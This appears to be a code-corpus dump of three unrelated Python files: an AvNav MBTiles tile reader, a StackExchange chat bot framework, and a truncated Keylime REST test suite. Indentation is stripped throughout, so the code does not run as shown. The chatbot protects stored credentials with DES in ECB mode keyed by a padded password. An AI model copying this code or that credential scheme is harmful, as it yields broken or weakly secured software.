# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
#
###############################################################################
# read mbtiles files and provide them for access via http
import os
import sqlite3
import sys
import threading
import create_overview
from avnav_util import AVNLog, AVNUtil, ChartFile
#mbtiles:
#zoom_level => z
#tile_column => x
#tile_row => 2^z - 1 - y
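#worked example of the TMS mapping above: at zoom z=3 there are 2^3 = 8 rows,
#so the XYZ tile (z=3, x=5, y=2) is stored with tile_row = 8 - 1 - 2 = 5,
#and rowToY(3, 5) maps it back to y=2 (the transform is its own inverse)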
class QueueEntry(object):
def __init__(self,tile):
self.cond=threading.Condition()
self.tile=tile
self.data=None
self.dataAvailable=False
def waitAndGet(self):
while True:
self.cond.acquire()
if self.dataAvailable:
self.cond.release()
return self.data
self.cond.wait(5)
self.cond.release()
def wakeUp(self):
self.cond.acquire()
try:
self.cond.notify_all()
finally:
self.cond.release()
def setData(self,data):
self.cond.acquire()
self.data=data
self.dataAvailable=True
self.cond.notify_all()
self.cond.release()
class MBTilesFile(ChartFile):
def __init__(self,filename,timeout=300):
self.filename=filename
self.isOpen=False
self.cond=threading.Condition()
self.connection=None
self.zoomlevels=[]
self.zoomLevelBoundings={}
self.schemeTMS=True
self.originalScheme=None
self.schemeInconsistent=False #if there is a scheme entry in the DB but no avnav_scheme
self.requestQueue=[]
self.timeout=timeout
self.stop=False
self.handler=threading.Thread(target=self.handleRequests)
self.handler.setDaemon(True)
self.handler.start()
self.changeCount=AVNUtil.utcnow()
def getOriginalScheme(self):
if not self.schemeInconsistent:
return None
return self.originalScheme
def wakeUp(self):
self.cond.acquire()
try:
self.cond.notify_all()
finally:
self.cond.release()
def handleRequests(self):
connection=sqlite3.connect(self.filename)
while not self.stop:
self.cond.acquire()
request=None
if len(self.requestQueue) > 0:
request=self.requestQueue.pop(0)
else:
self.cond.wait(5)
self.cond.release()
if request is not None:
data=self.getTileDataInternal(request.tile,connection)
request.setData(data)
connection.close()
#tile is (z,x,y)
def zxyToZoomColRow(self,tile):
if self.schemeTMS:
return [tile[0],tile[1],pow(2,tile[0])-1-tile[2]]
else:
return [tile[0],tile[1],tile[2]]
def rowToY(self, z, row):
if self.schemeTMS:
return pow(2,z)-1-row
else:
return row
def colToX(self, z, col):
return col
#open the file and prepare the overview
def open(self):
if self.isOpen:
raise Exception("mbtiles file %s already open" % (self.filename))
if not os.path.isfile(self.filename):
raise Exception("mbtiles file %s not found" %(self.filename))
self.createOverview()
self.isOpen=True
#tile is (z,x,y)
def getTileData(self,tile,source):
if not self.isOpen:
raise Exception("not open")
request=QueueEntry(tile)
self.cond.acquire()
try:
self.requestQueue.append(request)
self.cond.notify_all()
except:
pass
self.cond.release()
AVNLog.debug("waiting for tile")
data=request.waitAndGet()
AVNLog.debug("tile received")
return data
def getTileDataInternal(self,tile,connection):
cu=None
try:
cu=connection.execute("select tile_data from tiles where zoom_level=? and tile_column=? and tile_row=?",self.zxyToZoomColRow(tile))
t=cu.fetchone()
cu.close()
return t[0]
except Exception as e:
if cu is not None:
try:
cu.close()
except:
pass
return None
def getAvnavXml(self,upzoom=2):
if not self.isOpen:
return None
ranges=[]
for zl in self.zoomlevels:
de=self.zoomLevelBoundings[zl].copy()
de['zoom']=zl
ranges.append(de)
#create a single source with one range for each zoomlevel
data=[{"name":"mbtiles","ranges":ranges}]
return create_overview.getGemfInfo(data,{})
def createOverview(self):
zoomlevels=[]
zoomLevelBoundings={}
connection = sqlite3.connect(self.filename)
if connection is None:
raise Exception("unable to open mbtiles file %s" % (self.filename))
AVNLog.info("opening mbtiles file %s", self.filename)
cu = None
hasAvnavScheme=False
try:
cu = connection.cursor()
for sr in cu.execute("select value from metadata where name=?",["avnav_scheme"]):
v=sr[0]
if v is not None:
v=v.lower()
if v in ['tms','xyz']:
AVNLog.info("setting scheme for %s to %s",self.filename,v)
self.schemeTMS=False if v == "xyz" else True
self.schemeInconsistent=False
hasAvnavScheme=True
#check if there is a scheme entry
for sr in cu.execute("select value from metadata where name=?",["scheme"]):
v=sr[0]
if v is not None:
v=v.lower()
self.originalScheme=v
if not hasAvnavScheme:
self.schemeInconsistent=True
for zl in cu.execute("select distinct zoom_level from tiles;"):
zoomlevels.append(zl[0])
for zl in zoomlevels:
el = {}
for rowmima in cu.execute("select min(tile_row),max(tile_row) from tiles where zoom_level=?", [zl]):
# names must match getGemfInfo in create_overview
if self.schemeTMS:
el['ymin'] = self.rowToY(zl, rowmima[1])
el['ymax'] = self.rowToY(zl, rowmima[0])
else:
el['ymin'] = self.rowToY(zl, rowmima[0])
el['ymax'] = self.rowToY(zl, rowmima[1])
for colmima in cu.execute("select min(tile_column),max(tile_column) from tiles where zoom_level=?", [zl]):
el['xmin'] = self.colToX(zl, colmima[0])
el['xmax'] = self.colToX(zl, colmima[1])
zoomLevelBoundings[zl] = el
except Exception as e:
AVNLog.error("error reading base info from %s:%s", self.filename, str(e))
self.zoomlevels=zoomlevels
self.zoomLevelBoundings=zoomLevelBoundings
if cu is not None:
cu.close()
connection.close()
self.changeCount=AVNUtil.utcnow()
def changeScheme(self,schema,createOverview=True):
if schema not in ['xyz','tms']:
raise Exception("unknown schema %s"%schema)
if schema == "xyz":
if not self.schemeTMS and not self.schemeInconsistent:
return False
self.schemeTMS=False
if schema == "tms":
if self.schemeTMS and not self.schemeInconsistent:
return False
self.schemeTMS=True
con=sqlite3.connect(self.filename)
cu = con.cursor()
try:
rs=cu.execute("select value from metadata where name=?", ["avnav_scheme"])
row=rs.fetchone()
if row is not None:
cu.execute("update metadata set value=? where name='avnav_scheme'",[schema])
con.commit()
else:
cu.execute("insert into metadata (name,value) values ('avnav_scheme',?)",[schema])
con.commit()
except Exception as e:
cu.close()
con.close()
raise
cu.close()
con.close()
if (createOverview):
self.createOverview()
return True
def getScheme(self):
return "tms" if self.schemeTMS else "xyz"
def close(self):
if not self.isOpen:
return
self.stop=True
#cancel all requests by returning None
self.cond.acquire()
requests=self.requestQueue
self.requestQueue=[]
self.cond.notify_all()
self.cond.release()
for rq in requests:
try:
rq.setData(None)
except:
pass
def deleteFiles(self):
self.close()
if os.path.isfile(self.filename):
os.unlink(self.filename)
def getChangeCount(self):
return self.changeCount
def getDownloadFile(self):
return self.filename
def __str__(self):
rt="mbtiles %s " %(self.filename)
return rt
if __name__ == "__main__":
f=MBTilesFile(sys.argv[1])
f.open()
print("read file %s" %(f,))
print(f.getAvnavXml())
|
chatbot.py | # -*- coding: utf-8 -*-
## V 3.0
"""
ChangeLog
- V3.0 -
Rewrote chatbot.py using classes
Cleaned the code
Using pycryptodome instead of simplecrypt
Using websockets to listen top new events
"""
## Description
"""
A framework to set up a chat bot on StackExchange's chat rooms
"""
# Imports and initialization
import requests # making POST/GET requests
import json # fast JSON library
import time # timestamping events + measuring intervals between events / pausing the program / getting time since epoch for starting timestamps
import os # get local path, create folders
import Cryptodome.Cipher.DES # encrypt and decrypt credidentials
import getpass # input password without outputing characters on CLI
import sys # exit program
import websocket # listen to and send websockets from/to the chat
import threading # multiprocessing - to make the rooms run in parallel
import datetime
EVENTS = {
1: "EventMessagePosted",
2: "EventMessageEdited",
3: "EventUserJoined",
4: "EventUserLeft",
5: "EventRoomNameChanged",
6: "EventMessageStarred",
7: "EventDebugMessage",
8: "EventUserMentioned",
9: "EventMessageFlagged",
10: "EventMessageDeleted",
11: "EventFileAdded",
12: "EventModeratorFlag",
13: "EventUserSettingsChanged",
14: "EventGlobalNotification",
15: "EventAccessLevelChanged",
16: "EventUserNotification",
17: "EventInvitation",
18: "EventMessageReply",
19: "EventMessageMovedOut",
20: "EventMessageMovedIn",
21: "EventTimeBreak",
22: "EventFeedTicker",
29: "EventUserSuspended",
30: "EventUserMerged",
34: "EventUserNameOrAvatarChanged",
}
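# Illustrative lookup sketch (hypothetical helper, not used below): unknown event
# codes can be mapped to a fallback name instead of raising a KeyError, e.g.
#   event_name = EVENTS.get(event_type, "EventUnknown({})".format(event_type))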
# useful functions
def log(msg, name="../logs/log.txt",verbose=True): # Logging messages and errors | Appends <msg> to the log <name>, prints if verbose
msg=str(msg)
with open(name, "ab") as f:
timeStr = str(time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time())))
f.write('{} {}\n'.format(timeStr,msg).encode('utf-8'))
if verbose: print('<Log> {}'.format(msg.encode('utf-8')))
def logFile(r,name="../logs/logFile.html"): # logs the string in the file <name>. Will overwrite previous data.
with open(name, "wb") as f:
f.write(r.encode('utf-8'))
def get_credidentials(decrypt_key = None): # gets credidentials from encrypted file / asks for them and encrypts them
## WARNING: ENCRYPTION DOES NOT SUPPORT PASSWORDS WITH " " (blank spaces) !!
def pad(text): # makes length a multiple of 8 and transforms to bytes
if len(text)%8==0: return text.encode('utf-8')
return (text+' '*(8-len(text)%8) ).encode('utf-8')
verif_text="verif||" # text used to check if the decrypted strings are the good ones, i.e. if the provided key is valid
if os.path.isfile("Credidentials"): # Credidentials file exists, decrypt them
goodPassword=False
while not goodPassword:
if decrypt_key is None:
hash_password = pad(getpass.getpass("Password for the encrypted credidentials ? "))
else:
hash_password = pad(decrypt_key)
with open("Credidentials","rb") as f:
encrypted_string=f.read()
encrypted_verif=encrypted_string[:encrypted_string.find(b'/../')]
encrypted_email=encrypted_string[encrypted_string.find(b'/../')+len(b'/../'):encrypted_string.find(b'|..|')]
encrypted_password = encrypted_string[encrypted_string.find(b'|..|')+len(b'|..|'):]
key=Cryptodome.Cipher.DES.new(hash_password, Cryptodome.Cipher.DES.MODE_ECB)
try:
verif=key.decrypt(encrypted_verif)
email=(key.decrypt(encrypted_email)).replace(b' ',b'')
password=(key.decrypt(encrypted_password)).replace(b' ',b'')
goodPassword= verif==pad(verif_text)
if goodPassword:
log('Credidentials retrieved successfully')
except Exception as e:
log('Error while decrypting credidentials: {}'.format(e))
goodPassword=False
if not goodPassword:
log('Bad password / corrupted file, try again.')
else: # No credidentials are stored, ask for new ones
with open("../configurations/vyxal-bot.json", "r") as f:
data = json.load(f)
email = data["email"]
password = data["password"]
return email, password
def abort(): sys.exit()
# handle rooms interactions
class Room():
def __init__(self, room_id, chatbot, onActivity):
# propagate vars
self.id=room_id # room identifier
self.chatbot=chatbot # parent chatbot
self.onActivity=onActivity # callback for events
#initialize vars
self.thread=None # own thread
self.running=False # currently running ?
self.ws=None # WebSocket
self.temp_path="{}/temp".format(self.id)
# initialize
self.connect_ws() # attempt to connect via WebSockets
if not os.path.exists("{}".format(self.id)):
os.makedirs("{}".format(self.id))
if not os.path.exists("{}/temp".format(self.id)):
os.makedirs("{}/temp".format(self.id))
def __repr__(self):
return 'Room(id = {})'.format(self.id)
def connect_ws(self):
payload={"fkey": self.chatbot.fkey,'roomid': self.id}
try:
response=self.chatbot.sendRequest("https://chat.stackexchange.com/ws-auth","post",payload).text
print(response)
r=json.loads(response)
except Exception as e:
log("Connection to room {} failed : {}".format(self.id,e))
return
wsurl=r['url']+'?l={}'.format(int(time.time()))
self.ws = websocket.create_connection(wsurl, origin="http://chat.stackexchange.com")
self.thread = threading.Thread(target=self.run)
#self.thread.setDaemon(True)
self.thread.start()
def run(self):
self.running=True
while self.running:
a = None
try:
a = self.ws.recv()
except:
log('Unexpected error for room {}; rebooting'.format(self.id))
requests.get("http://localhost:5888/kill")
self.running=False
if a is not None and a != "":# not an empty message
a=json.loads(a)
if "r{}".format(self.id) in a:
a=a["r{}".format(self.id)]
if a!={}:
try:
self.handleActivity(a)
except:
pass
def leave(self):
log("Left room {}".format(self.id))
self.running=False
self.chatbot.rooms_joined.remove(self)
def handleActivity(self, activity):
log('Got activity {}'.format(activity), verbose=False)
self.onActivity(activity)
try: activity_timestamp=activity['t']
except: log('Put in timeout for {} more seconds'.format(activity['timeout']))
if "e" in activity: # if there are events recorded
for event in activity['e']:
if event['event_type'] > 2:
log('Event: ' + EVENTS[event['event_type']])
log('Event details: ' + str(event))
def sendMessage(self, msg, wait=False):
if not wait: log(msg)
payload = {"fkey": self.chatbot.fkey, "text": msg}
headers={'Referer': 'https://chat.stackexchange.com/rooms/{}'.format(self.id),'Origin': 'https://chat.stackexchange.com'}
r = self.chatbot.sendRequest("http://chat.stackexchange.com/chats/{}/messages/new".format(self.id), "post", payload, headers=headers)
if r.text.find("You can perform this action again") >= 0: # sending messages too fast
time.sleep(3)
return self.sendMessage(msg, True)
if r.text.find("The message is too long") >= 0:
log("Message too long : {}".format(msg))
return False
r = r.json()
# log(r)
return r["id"]
def editMessage(self, msg, msg_id): # edit message with id <msg_id> to have the new content <msg>
payload = {"fkey": self.chatbot.fkey, "text": msg}
headers = {'Referer': "http://chat.stackexchange.com/rooms/{}".format(self.id)}
r = self.chatbot.sendRequest("http://chat.stackexchange.com/messages/{}".format(msg_id), "post", payload, headers).text
if r.find("You can perform this action again") >= 0:
time.sleep(3)
self.editMessage(msg, msg_id)
def deleteMessage(self, msg_id): # delete message with id <msg_id>
payload = {"fkey": self.chatbot.fkey}
headers = {'Referer': "http://chat.stackexchange.com/rooms/{}".format(self.id)}
r = self.chatbot.sendRequest("http://chat.stackexchange.com/messages/{}/delete".format(msg_id), "post", payload, headers).text
if r.find("You can perform this action again") >= 0:
time.sleep(3)
self.deleteMessage(msg_id)
# main class
class Chatbot():
def __init__(self, decrypt = None, verbose=True):
# init vars
self.session = requests.Session() # Session for POST/GET requests
self.fkey=None # key used by SE to authentify users, needed to talk in the chat
self.bot_chat_id=None
self.rooms_joined=[]
self.host=None
self.decrypt_key = decrypt
# propagate vars
self.verbose=verbose
def sendRequest(self, url, typeR="get", payload={}, headers={},verify=True): # sends a POST/GET request to <url> with arguments <payload>, headers <headers>. Will check SSL if <verify>.
r = ""
successful, tries = False, 0
while not successful:
try:
if typeR == "get":
r = self.session.get(url, data=payload, headers=headers, verify=verify)
elif typeR == "post":
r = self.session.post(url, data=payload, headers=headers, verify=verify, cookies=requests.utils.dict_from_cookiejar(self.session.cookies)) # ugly patch
else:
log("Error while sending requets - Invalid request type :{}".format(typeR))
successful = True
except Exception as e:
time.sleep(1)
if tries >= 4:
if type(r) != type(""): # string or request object ?
r = r.text
log("Error while sending request - The request failed : {}".format(e))
return False
tries += 1
return r
def log(self, msg, name="../logs/log.txt"): # Logging messages and errors | Appends <msg> to the log <name>, prints if self.verbose
log(msg,name,verbose=self.verbose)
def login(self, host="codegolf.stackexchange.com"): # Login to SE
def getField(field, url="", r=""):
"""gets the hidden field <field> from string <r> ELSE url <url>"""
if r == "":
r = self.sendRequest(url, 'get').text
r.encode('utf-8')
p = r.find('name="' + field)
if p <= 0:
error("No field <" + field + "> found", r)
p = r.find('value="', p) + len('value="')
key = r[p:r.find('"', p + 1)]
return key
self.log("--- NEW LOGIN ---")
email, password = get_credidentials(self.decrypt_key)
# Login to OpenId / CSE
fkey=getField("fkey", "https://openid.stackexchange.com/account/login")
payload = {"email": email, "password": password, "isSignup":"false", "isLogin":"true","isPassword":"false","isAddLogin":"false","hasCaptcha":"false","ssrc":"head","submitButton":"Log in",
"fkey": fkey}
r = self.sendRequest("https://{}/users/login-or-signup/validation/track".format(host),"post",payload).text
if r.find("Login-OK")<0:
log("Logging to SE - FAILURE - aborting")
abort()
log("Logging to SE - OK")
payload = {"email": email, "password": password, "ssrc":"head", "fkey": fkey}
r = self.sendRequest("https://{}/users/login?ssrc=head&returnurl=https%3a%2f%2f{}%2f".format(host, host),"post",payload).text
if r.find('<a href="https://{}/users/logout"'.format(host))<0:
if 'Human verification' in r:
log('Caught by CAPTCHA')
log("Loading SE profile - FAILURE - aborting")
abort()
log("Loading SE profile - OK")
# Logs in to all other SE sites
self.sendRequest("https://{}/users/login/universal/request".format(host),"post")
# get chat key
r = self.sendRequest("https://chat.stackexchange.com/chats/join/favorite", "get").text
p=r.find('<a href="/users/')+len('<a href="/users/')
self.bot_chat_id=int(r[p:r.find('/',p)])
fkey=getField("fkey", r=r) # /!\ changes from previous one
self.fkey=fkey
log("Got chat fkey : {}".format(fkey))
log("Login to the SE chat successful")
def joinRoom(self,room_id,onActivity): # Join a chatroom
r=Room(room_id, self, onActivity)
self.rooms_joined.append(r)
return r
def leaveAllRooms(self):
for room in self.rooms_joined:
room.leave()
def logout(self):
self.sendRequest('https://openid.stackexchange.com/account/logout', 'post')
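# Minimal usage sketch (the room id and activity handler are placeholders):
#   bot = Chatbot()
#   bot.login(host="codegolf.stackexchange.com")
#   room = bot.joinRoom(12345, onActivity=lambda activity: None)
#   room.sendMessage("Hello from the bot!")
#   bot.leaveAllRooms()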
|
test_restful.py | #!/usr/bin/python3
'''
SPDX-License-Identifier: Apache-2.0
Copyright 2017 Massachusetts Institute of Technology.
NOTE:
This unittest is being used as a procedural test.
The tests must be run in-order and CANNOT be parallelized!
Tests all but two RESTful interfaces:
* agent's POST /v2/keys/vkey
- Done by CV after the CV's POST /v2/agents/{UUID} command is performed
* CV's PUT /v2/agents/{UUID}
- POST already bootstraps agent, so PUT is redundant in this test
The registrar's PUT vactivate interface is only tested if a vTPM is present!
USAGE:
Should be run in test directory under root privileges with either command:
* python -m unittest -v test_restful
* green -vv
(with `pip install green`)
To run without root privileges, be sure to export KEYLIME_TEST=True
For Python Coverage support (pip install coverage), set env COVERAGE_FILE and:
* coverage run --parallel-mode test_restful.py
'''
import sys
import signal
import unittest
import subprocess
import time
import os
import base64
import threading
import shutil
import errno
from pathlib import Path
import dbus
import simplejson as json
from keylime import config
from keylime import tornado_requests
from keylime.requests_client import RequestsClient
from keylime import tenant
from keylime import crypto
from keylime.cmd import user_data_encrypt
from keylime import secure_mount
from keylime.tpm import tpm_main
from keylime.tpm import tpm_abstract
# Coverage support
if "COVERAGE_FILE" in os.environ:
FORK_ARGS = ["coverage", "run", "--parallel-mode"]
if "COVERAGE_DIR" in os.environ:
FORK_ARGS += ["--rcfile=" + os.environ["COVERAGE_DIR"] + "/.coveragerc"]
else:
FORK_ARGS = ["python3"]
# Custom imports
PACKAGE_ROOT = Path(__file__).parents[1]
KEYLIME_DIR = (f"{PACKAGE_ROOT}/keylime")
sys.path.append(KEYLIME_DIR)
# Custom imports
# PACKAGE_ROOT = Path(__file__).parents[1]
# CODE_ROOT = (f"{PACKAGE_ROOT}/keylime/")
# sys.path.insert(0, CODE_ROOT)
# Will be used to communicate with the TPM
tpm_instance = None
# cmp was removed in Python 3, so let's recreate it.
def cmp(a, b):
return (a > b) - (a < b)
# Ensure this is run as root
if os.geteuid() != 0 and config.REQUIRE_ROOT:
sys.exit("Tests need to be run with root privileges, or set env KEYLIME_TEST=True!")
# Force sorting tests alphabetically
unittest.TestLoader.sortTestMethodsUsing = lambda _, x, y: cmp(x, y)
# Environment to pass to services
script_env = os.environ.copy()
# Globals to keep track of Keylime components
cv_process = None
reg_process = None
agent_process = None
tenant_templ = None
# Class-level components that are not static (so can't be added to test class)
public_key = None
keyblob = None
ek_tpm = None
aik_tpm = None
vtpm = False
# Set up mTLS
my_cert = config.get('tenant', 'my_cert')
my_priv_key = config.get('tenant', 'private_key')
cert = (my_cert, my_priv_key)
tls_enabled = True
# Like os.remove, but ignore file DNE exceptions
def fileRemove(path):
try:
os.remove(path)
except OSError as e:
# Ignore if file does not exist
if e.errno != errno.ENOENT:
raise
# Boring setup stuff
def setUpModule():
try:
env = os.environ.copy()
env['PATH'] = env['PATH'] + ":/usr/local/bin"
# Run init_tpm_server and tpm_serverd (start fresh)
its = subprocess.Popen(["init_tpm_server"], shell=False, env=env)
its.wait()
tsd = subprocess.Popen(["tpm_serverd"], shell=False, env=env)
tsd.wait()
except Exception as e:
print("WARNING: Restarting TPM emulator failed!")
# Note: the following is required as abrmd is failing to reconnect to MSSIM, once
# MSSIM is killed and restarted. If this is proven to be an actual bug and is
# fixed upstream, the following dbus restart call can be removed.
try:
sysbus = dbus.SystemBus()
systemd1 = sysbus.get_object('org.freedesktop.systemd1', '/org/freedesktop/systemd1')
manager = dbus.Interface(systemd1, 'org.freedesktop.systemd1.Manager')
# If the systemd service exists, let's restart it.
for service in sysbus.list_names():
if "com.intel.tss2.Tabrmd" in service:
print("Found dbus service:", str(service))
try:
print("Restarting tpm2-abrmd.service.")
manager.RestartUnit('tpm2-abrmd.service', 'fail')
except dbus.exceptions.DBusException as e:
print(e)
except Exception as e:
print("Non systemd agent detected, no tpm2-abrmd restart required.")
try:
# Start with a clean slate for this test
fileRemove(config.WORK_DIR + "/tpmdata.yaml")
fileRemove(config.WORK_DIR + "/cv_data.sqlite")
fileRemove(config.WORK_DIR + "/reg_data.sqlite")
shutil.rmtree(config.WORK_DIR + "/cv_ca", True)
except Exception as e:
print("WARNING: Cleanup of TPM files failed!")
# CV must be run first to create CA and certs!
launch_cloudverifier()
launch_registrar()
# launch_cloudagent()
# Make the Tenant do a lot of set-up work for us
global tenant_templ
tenant_templ = tenant.Tenant()
tenant_templ.agent_uuid = config.get('cloud_agent', 'agent_uuid')
tenant_templ.cloudagent_ip = "localhost"
tenant_templ.cloudagent_port = config.get('cloud_agent', 'cloudagent_port')
tenant_templ.verifier_ip = config.get('cloud_verifier', 'cloudverifier_ip')
tenant_templ.verifier_port = config.get('cloud_verifier', 'cloudverifier_port')
tenant_templ.registrar_ip = config.get('registrar', 'registrar_ip')
tenant_templ.registrar_boot_port = config.get('registrar', 'registrar_port')
tenant_templ.registrar_tls_boot_port = config.get('registrar', 'registrar_tls_port')
tenant_templ.registrar_base_url = f'{tenant_templ.registrar_ip}:{tenant_templ.registrar_boot_port}'
tenant_templ.registrar_base_tls_url = f'{tenant_templ.registrar_ip}:{tenant_templ.registrar_tls_boot_port}'
tenant_templ.agent_base_url = f'{tenant_templ.cloudagent_ip}:{tenant_templ.cloudagent_port}'
# Set up TLS
my_tls_cert, my_tls_priv_key = tenant_templ.get_tls_context()
tenant_templ.cert = (my_tls_cert, my_tls_priv_key)
# Destroy everything on teardown
def tearDownModule():
# Tear down in reverse order of dependencies
kill_cloudagent()
kill_cloudverifier()
kill_registrar()
def launch_cloudverifier():
"""Start up the cloud verifier"""
global cv_process, script_env, FORK_ARGS
if cv_process is None:
cv_process = subprocess.Popen("keylime_verifier",
shell=False,
preexec_fn=os.setsid,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
env=script_env)
def initthread():
sys.stdout.write('\033[96m' + "\nCloud Verifier Thread" + '\033[0m')
while True:
line = cv_process.stdout.readline()
if line == b'':
break
line = line.decode('utf-8')
line = line.rstrip(os.linesep)
sys.stdout.flush()
sys.stdout.write('\n\033[96m' + line + '\033[0m')
t = threading.Thread(target=initthread)
t.start()
time.sleep(30)
return True
def launch_registrar():
"""Start up the registrar"""
global reg_process, script_env, FORK_ARGS
if reg_process is None:
reg_process = subprocess.Popen("keylime_registrar",
shell=False,
preexec_fn=os.setsid,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
env=script_env)
def initthread():
sys.stdout.write('\033[95m' + "\nRegistrar Thread" + '\033[0m')
while True:
line = reg_process.stdout.readline()
if line == b"":
break
# line = line.rstrip(os.linesep)
line = line.decode('utf-8')
sys.stdout.flush()
sys.stdout.write('\n\033[95m' + line + '\033[0m')
t = threading.Thread(target=initthread)
t.start()
time.sleep(10)
return True
def launch_cloudagent():
"""Start up the cloud agent"""
global agent_process, script_env, FORK_ARGS
if agent_process is None:
agent_process = subprocess.Popen("keylime_agent",
shell=False,
preexec_fn=os.setsid,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
env=script_env)
def initthread():
sys.stdout.write('\033[94m' + "\nCloud Agent Thread" + '\033[0m')
while True:
line = agent_process.stdout.readline()
if line == b'':
break
# line = line.rstrip(os.linesep)
line = line.decode('utf-8')
sys.stdout.flush()
sys.stdout.write('\n\033[94m' + line + '\033[0m')
t = threading.Thread(target=initthread)
t.start()
time.sleep(10)
return True
def kill_cloudverifier():
"""Kill the cloud verifier"""
global cv_process
if cv_process is None:
return
os.killpg(os.getpgid(cv_process.pid), signal.SIGINT)
cv_process.wait()
cv_process = None
def kill_registrar():
"""Kill the registrar"""
global reg_process
if reg_process is None:
return
os.killpg(os.getpgid(reg_process.pid), signal.SIGINT)
reg_process.wait()
reg_process = None
def kill_cloudagent():
"""Kill the cloud agent"""
global agent_process
if agent_process is None:
return
os.killpg(os.getpgid(agent_process.pid), signal.SIGINT)
agent_process.wait()
agent_process = None
def services_running():
if reg_process.poll() is None and cv_process.poll() is None:
return True
return False
class TestRestful(unittest.TestCase):
# Static class members (won't change between tests)
payload = None
auth_tag = None
tpm_policy = {}
vtpm_policy = {}
metadata = {}
allowlist = {}
revocation_key = ""
mb_refstate = None
K = None
U = None
V = None
api_version = config.API_VERSION
cloudagent_ip = None
cloudagent_port = None
@classmethod
def setUpClass(cls):
"""Prepare the keys and payload to give to the CV"""
contents = "random garbage to test as payload"
# contents = contents.encode('utf-8')
ret = user_data_encrypt.encrypt(contents)
cls.K = ret['k']
cls.U = ret['u']
cls.V = ret['v']
cls.payload = ret['ciphertext']
# Set up to register an agent
cls.auth_tag = crypto.do_hmac(cls.K, tenant_templ.agent_uuid)
# Prepare policies for agent
cls.tpm_policy = config.get('tenant', 'tpm_policy')
cls.vtpm_policy = config.get('tenant', 'vtpm_policy')
cls.tpm_policy = tpm_abstract.TPM_Utilities.readPolicy(cls.tpm_policy)
cls.vtpm_policy = tpm_abstract.TPM_Utilities.readPolicy(cls.vtpm_policy)
# Allow targeting a specific API version (default latest)
cls.api_version = config.API_VERSION
def setUp(self):
"""Nothing to set up before each test"""
return
def test_000_services(self):
"""Ensure everyone is running before doing tests"""
self.assertTrue(services_running(), "Not all services started successfully!")
# Registrar Testset
def test_010_reg_agent_post(self):
"""Test registrar's POST /v2/agents/{UUID} Interface"""
global keyblob, vtpm, tpm_instance, ek_tpm, aik_tpm
tpm_instance = tpm_main.tpm()
# Change CWD for TPM-related operations
cwd = os.getcwd()
config.ch_dir(config.WORK_DIR, None)
_ = secure_mount.mount()
# Initialize the TPM with AIK
(ekcert, ek_tpm, aik_tpm) = tpm_instance.tpm_init(self_activate=False,
config_pw=config.get('cloud_agent', 'tpm_ownerpassword'))
vtpm = tpm_instance.is_vtpm()
# Handle virtualized and emulated TPMs
if ekcert is None:
if vtpm:
ekcert = 'virtual'
elif tpm_instance.is_emulator():
ekcert = 'emulator'
# Get back to our original CWD
config.ch_dir(cwd, None)
data = {
'ekcert': ekcert,
'aik_tpm': aik_tpm,
}
if ekcert is None or ekcert == 'emulator':
data['ek_tpm'] = ek_tpm
test_010_reg_agent_post = RequestsClient(tenant_templ.registrar_base_url, tls_enabled=False)
response = test_010_reg_agent_post.post(
f'/v{self.api_version}/agents/{tenant_templ.agent_uuid}',
data=json.dumps(data),
cert="",
verify=False
)
self.assertEqual(response.status_code, 200, "Non-successful Registrar agent Add return code!")
json_response = response.json()
# Ensure response is well-formed
self.assertIn("results", json_response, "Malformed response body!")
self.assertIn("blob", json_response["results"], "Malformed response body!")
keyblob = json_response["results"]["blob"]
self.assertIsNotNone(keyblob, "Malformed response body!")
@unittest.skipIf(vtpm, "Registrar's PUT /v2/agents/{UUID}/activate only for non-vTPMs!")
def test_011_reg_agent_activate_put(self):
"""Test registrar's PUT /v2/agents/{UUID}/activate Interface"""
global keyblob
self.assertIsNotNone(keyblob, "Required value not set. Previous step may have failed?")
key = tpm_instance.activate_identity(keyblob)
data = {
'auth_tag': crypto.do_hmac(key, tenant_templ.agent_uuid),
}
test_011_reg_agent_activate_put = RequestsClient(tenant_templ.registrar_base_url, tls_enabled=False)
response = test_011_reg_agent_activate_put.put(
f'/v{self.api_version}/agents/{tenant_templ.agent_uuid}/activate',
data=json.dumps(data),
cert="",
verify=False
)
self.assertEqual(response.status_code, 200, "Non-successful Registrar agent Activate return code!")
json_response = response.json()
# Ensure response is well-formed
self.assertIn("results", json_response, "Malformed response body!")
def test_013_reg_agents_get(self):
"""Test registrar's GET /v2/agents Interface"""
test_013_reg_agents_get = RequestsClient(tenant_templ.registrar_base_tls_url, tls_enabled=True)
response = test_013_reg_agents_get.get(
f'/v{self.api_version}/agents/',
cert=tenant_templ.cert,
verify=False
)
self.assertEqual(response.status_code, 200, "Non-successful Registrar agent List return code!")
json_response = response.json()
# Ensure response is well-formed
self.assertIn("results", json_response, "Malformed response body!")
self.assertIn("uuids", json_response["results"], "Malformed response body!")
# We registered exactly one agent so far
self.assertEqual(1, len(json_response["results"]["uuids"]), "Incorrect system state!")
def test_014_reg_agent_get(self):
"""Test registrar's GET /v2/agents/{UUID} Interface"""
test_014_reg_agent_get = RequestsClient(tenant_templ.registrar_base_tls_url, tls_enabled=True)
response = test_014_reg_agent_get.get(
f'/v{self.api_version}/agents/{tenant_templ.agent_uuid}',
cert=tenant_templ.cert,
verify=False
)
self.assertEqual(response.status_code, 200, "Non-successful Registrar agent return code!")
json_response = response.json()
# Ensure response is well-formed
self.assertIn("results", json_response, "Malformed response body!")
self.assertIn("ek_tpm", json_response["results"], "Malformed response body!")
self.assertIn("aik_tpm", json_response["results"], "Malformed response body!")
self.assertIn("ekcert", json_response["results"], "Malformed response body!")
global aik_tpm
aik_tpm = json_response["results"]["aik_tpm"]
def test_015_reg_agent_delete(self):
"""Test registrar's DELETE /v2/agents/{UUID} Interface"""
test_015_reg_agent_delete = RequestsClient(tenant_templ.registrar_base_tls_url, tls_enabled=True)
response = test_015_reg_agent_delete.delete(
f'/v{self.api_version}/agents/{tenant_templ.agent_uuid}',
cert=tenant_templ.cert,
verify=False
)
self.assertEqual(response.status_code, 200, "Non-successful Registrar Delete return code!")
json_response = response.json()
# Ensure response is well-formed
self.assertIn("results", json_response, "Malformed response body!")
# Agent Setup Testset
def test_020_agent_keys_pubkey_get(self):
